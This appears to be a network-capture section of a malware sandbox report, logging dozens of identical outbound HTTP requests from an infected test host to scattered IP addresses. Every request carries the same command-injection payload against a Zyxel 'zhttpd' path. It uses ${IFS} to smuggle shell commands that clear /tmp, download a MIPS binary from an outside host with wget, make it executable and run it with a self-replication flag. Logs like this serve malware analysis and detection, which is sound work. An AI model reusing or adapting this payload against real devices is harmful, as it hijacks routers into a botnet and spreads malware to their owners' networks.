                                                Jan 12, 2024 18:16:34.714829922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7208192.168.2.234964666.38.218.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714876890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7209192.168.2.2349444173.140.233.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714901924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7210192.168.2.2352810129.236.7.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714951038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7211192.168.2.2336806217.69.253.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.714982033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7212192.168.2.2351850106.241.229.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715038061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7213192.168.2.2343296115.201.37.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715085030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7214192.168.2.233838218.153.177.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715111971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7215192.168.2.234147851.78.152.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715162992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7216192.168.2.234275053.156.249.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715202093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7217192.168.2.2357318207.75.55.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715224981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7218192.168.2.235600625.63.145.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715281963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7219192.168.2.2338630190.190.16.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715337038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7220192.168.2.2339818222.141.3.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715380907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7221192.168.2.234646076.220.0.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715394020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7222192.168.2.235878069.104.76.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715440035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7223192.168.2.234354458.14.143.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715497017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7224192.168.2.2357630162.19.180.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715524912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7225192.168.2.2351322166.181.178.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715578079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7226192.168.2.234900477.224.127.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715615988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7227192.168.2.235842074.241.105.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715642929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7228192.168.2.23419264.247.61.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715677977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7229192.168.2.2345778180.8.76.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715750933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7230192.168.2.233448261.246.25.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715770960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7231192.168.2.2344522163.85.125.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715800047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7232192.168.2.233348453.125.237.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715841055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7233192.168.2.2344068184.237.172.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715897083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7234192.168.2.2344052223.176.232.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715925932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7235192.168.2.234268891.176.142.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.715970993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7236192.168.2.2353374222.156.194.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716008902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7237192.168.2.234616647.176.154.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716048956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7238192.168.2.235830643.229.180.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716070890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7239192.168.2.2347062176.130.189.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716113091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7240192.168.2.233803468.161.205.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716178894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7241192.168.2.235089463.111.53.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716240883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7242192.168.2.2334474158.10.190.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716248989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7243192.168.2.2358376179.96.109.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716299057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7244192.168.2.2350704143.132.201.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716316938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7245192.168.2.2342682113.4.142.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716365099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7246192.168.2.234017448.190.74.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716423988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7247192.168.2.234078067.14.207.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716484070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7248192.168.2.2355524157.92.12.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716517925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7249192.168.2.2338082109.16.123.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716556072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7250192.168.2.2346780168.173.46.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716593981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7251192.168.2.2340200152.44.174.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716648102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7252192.168.2.2352588129.175.186.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716712952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7253192.168.2.2338086141.218.54.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716738939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7254192.168.2.2337718202.95.169.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716798067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7255192.168.2.2355400207.157.13.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716825008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7256192.168.2.233683688.253.136.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716881990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7257192.168.2.233410827.114.232.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716913939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7258192.168.2.236044297.70.71.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.716970921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7259192.168.2.2356172216.71.179.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717008114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7260192.168.2.235847867.203.129.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717056990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7261192.168.2.2338440195.155.100.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717083931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7262192.168.2.233610466.128.75.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717128992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7263192.168.2.234196669.35.19.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717178106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7264192.168.2.235083254.188.203.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717200041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7265192.168.2.2333688177.60.90.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717257023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7266192.168.2.234955249.151.237.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717310905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7267192.168.2.2341948152.210.4.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717350960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7268192.168.2.233301292.13.233.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717413902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7269192.168.2.2350998193.251.219.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.717432976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7270192.168.2.2337586124.43.69.100443
                                                TimestampBytes transferredDirectionData
